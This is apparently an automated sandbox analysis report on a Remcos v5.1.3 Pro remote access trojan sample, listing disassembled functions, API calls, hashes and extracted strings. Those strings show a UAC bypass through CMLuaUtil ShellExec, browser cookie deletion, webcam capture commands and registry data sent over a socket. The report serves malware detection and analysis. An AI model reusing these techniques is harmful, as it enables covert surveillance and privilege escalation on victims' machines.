                                                                                                                                                Function 004475F1 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __freea$__alloca_probe_16_free
                                                                                                                                                • String ID: a/p$am/pm$h{D
                                                                                                                                                • API String ID: 2936374016-2303565833
                                                                                                                                                • Opcode ID: 4ddb7e6ff69264204235b909ea28f14837368a743d4617b198cabd7c05983ebc
                                                                                                                                                • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                                                                                                                • Opcode Fuzzy Hash: 4ddb7e6ff69264204235b909ea28f14837368a743d4617b198cabd7c05983ebc
                                                                                                                                                • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                                                                                                                Function 00444D7C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                                                                                                                • _free.LIBCMT ref: 00444E87
                                                                                                                                                • _free.LIBCMT ref: 00444E9E
                                                                                                                                                • _free.LIBCMT ref: 00444EBD
                                                                                                                                                • _free.LIBCMT ref: 00444ED8
                                                                                                                                                • _free.LIBCMT ref: 00444EEF
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$AllocateHeap
                                                                                                                                                • String ID: KED
                                                                                                                                                • API String ID: 3033488037-2133951994
                                                                                                                                                • Opcode ID: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                                                                                                                                • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                                                                                                                • Opcode Fuzzy Hash: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                                                                                                                                • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                                                                                                                Function 00413A90 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Enum$InfoQueryValue
                                                                                                                                                • String ID: [regsplt]$xUG$TG
                                                                                                                                                • API String ID: 3554306468-1165877943
                                                                                                                                                • Opcode ID: 0915e5250acf3bea082794a31251f109dca26ef8e60840e512c7265f34e5d9a1
                                                                                                                                                • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                                                                                                                • Opcode Fuzzy Hash: 0915e5250acf3bea082794a31251f109dca26ef8e60840e512c7265f34e5d9a1
                                                                                                                                                • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                                                                                                                Function 00413D48 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D81
                                                                                                                                                  • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                                                                                  • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000,004660B4,004660B4,00466478,00466478,00000071), ref: 00413EEF
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                                                • String ID: xUG$NG$NG$TG
                                                                                                                                                • API String ID: 3114080316-2811732169
                                                                                                                                                • Opcode ID: 7a7e2ed596e912e6ef42e947eeb9eb1de9ee6fb09b7a4cfd1d5d0db7cb7d7a08
                                                                                                                                                • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                                                                                                                • Opcode Fuzzy Hash: 7a7e2ed596e912e6ef42e947eeb9eb1de9ee6fb09b7a4cfd1d5d0db7cb7d7a08
                                                                                                                                                • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                                                                                                                Function 004511AC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F918,?,00000000,?,00000001,?,000000FF,00000001,0043F918,?), ref: 004511F9
                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00451231
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451282
                                                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451294
                                                                                                                                                • __freea.LIBCMT ref: 0045129D
                                                                                                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                • String ID: PkGNG
                                                                                                                                                • API String ID: 313313983-263838557
                                                                                                                                                • Opcode ID: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                                                                                                                                • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                                                                                                                • Opcode Fuzzy Hash: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                                                                                                                                • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                                                                                                                Function 0040BF24 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004135E1: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                                                                  • Part of subcall function 004135E1: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                                                                                                  • Part of subcall function 004135E1: RegCloseKey.KERNELBASE(?), ref: 0041362D
                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                                                                                                                • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                                                • API String ID: 1133728706-4073444585
                                                                                                                                                • Opcode ID: 82f3536f7391415d25674f0736c327500bde81d48cd9b738ac55359f41ca632d
                                                                                                                                                • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                                                                                                                • Opcode Fuzzy Hash: 82f3536f7391415d25674f0736c327500bde81d48cd9b738ac55359f41ca632d
                                                                                                                                                • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                                                                                                                Function 00456BD3 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 6348a53403ba44e76667cab5d3d4b8c4f90ca5e92cff7b4211fa09d26e343de5
                                                                                                                                                • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                                                                                                                • Opcode Fuzzy Hash: 6348a53403ba44e76667cab5d3d4b8c4f90ca5e92cff7b4211fa09d26e343de5
                                                                                                                                                • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                                                                                                                Function 00450F7A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                                                                                                • _free.LIBCMT ref: 00450FC8
                                                                                                                                                  • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                • _free.LIBCMT ref: 00450FD3
                                                                                                                                                • _free.LIBCMT ref: 00450FDE
                                                                                                                                                • _free.LIBCMT ref: 00451032
                                                                                                                                                • _free.LIBCMT ref: 0045103D
                                                                                                                                                • _free.LIBCMT ref: 00451048
                                                                                                                                                • _free.LIBCMT ref: 00451053
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                                • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                                                                                                                • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                                • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                                                                                                                Function 0041119E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                                                                                                • int.LIBCPMT ref: 004111BE
                                                                                                                                                  • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                                                                  • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                • String ID: (mG
                                                                                                                                                • API String ID: 2536120697-4059303827
                                                                                                                                                • Opcode ID: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
                                                                                                                                                • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                                                                                                                • Opcode Fuzzy Hash: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
                                                                                                                                                • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                                                                                                                Function 0043A3DA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                                                                                                • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                                                                                • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                                                                                                                • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                                                                                • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                                                                                                                Function 004075EB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\LdSbZG1iH6.exe), ref: 0040760B
                                                                                                                                                  • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                                                                                                  • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                                                                                • CoUninitialize.OLE32 ref: 00407664
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                                                • String ID: C:\Users\user\Desktop\LdSbZG1iH6.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                                                • API String ID: 3851391207-556455252
                                                                                                                                                • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                                                                • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                                                                                                                • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                                                                • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                                                                                                                Function 0040BADC Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                                                                                                                • GetLastError.KERNEL32 ref: 0040BB22
                                                                                                                                                Strings
                                                                                                                                                • UserProfile, xrefs: 0040BAE8
                                                                                                                                                • [Chrome Cookies not found], xrefs: 0040BB3C
                                                                                                                                                • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                                                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DeleteErrorFileLast
                                                                                                                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                                                • API String ID: 2018770650-304995407
                                                                                                                                                • Opcode ID: d4592947abf79dc324386ffcaf4b9b591dee499912662422a1d7ea612805fe04
                                                                                                                                                • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                                                                                                                • Opcode Fuzzy Hash: d4592947abf79dc324386ffcaf4b9b591dee499912662422a1d7ea612805fe04
                                                                                                                                                • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                                                                                                                Function 0041CE2C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                                                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Console$AllocOutputShowWindow
                                                                                                                                                • String ID: Remcos v$5.1.3 Pro$CONOUT$
                                                                                                                                                • API String ID: 2425139147-2212855755
                                                                                                                                                • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                                                                                • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                                                                                                                • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                                                                                • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                                                                                                                Function 004433DA Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,0044338B,00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002), ref: 004433FA
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,0044338B,00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002,00000000,PkGNG), ref: 00443430
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                • String ID: CorExitProcess$PkGNG$mscoree.dll
                                                                                                                                                • API String ID: 4061214504-213444651
                                                                                                                                                • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                                                                                • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                                                                                                                • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                                                                                • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                                                                                                                Function 0043AB5C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __allrem.LIBCMT ref: 0043ACE9
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                                                                                                                • __allrem.LIBCMT ref: 0043AD1C
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                                                                                                                • __allrem.LIBCMT ref: 0043AD51
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1992179935-0
                                                                                                                                                • Opcode ID: 52068ab3a7cfe922dfe01ed446ba536eb0656cd97dd847f62b494b0202e28e08
                                                                                                                                                • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                                                                                                                • Opcode Fuzzy Hash: 52068ab3a7cfe922dfe01ed446ba536eb0656cd97dd847f62b494b0202e28e08
                                                                                                                                                • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                                                                                                                Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                                                                                                                                  • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prologSleep
                                                                                                                                                • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                                                                                                • API String ID: 3469354165-3054508432
                                                                                                                                                • Opcode ID: b4ffaf4d4bc36b92846901c683608e499d22e7149b7f9014ad6a348d41818569
                                                                                                                                                • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                                                                                                                • Opcode Fuzzy Hash: b4ffaf4d4bc36b92846901c683608e499d22e7149b7f9014ad6a348d41818569
                                                                                                                                                • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                                                                                                                Function 00411D39 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                                                                                                                • SetLastError.KERNEL32(000000C1,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                                                                                                                                • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,00000000), ref: 00411E04
                                                                                                                                                  • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00411CEE
                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,00000000), ref: 00411E4B
                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000), ref: 00411E52
                                                                                                                                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411F65
                                                                                                                                                  • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,00000000), ref: 00412122
                                                                                                                                                  • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 00412129
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3950776272-0
                                                                                                                                                • Opcode ID: 0997a6c101f2dd0e8850336bac1793923a5345a50e97098554ef69f44a303648
                                                                                                                                                • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                                                                                                                • Opcode Fuzzy Hash: 0997a6c101f2dd0e8850336bac1793923a5345a50e97098554ef69f44a303648
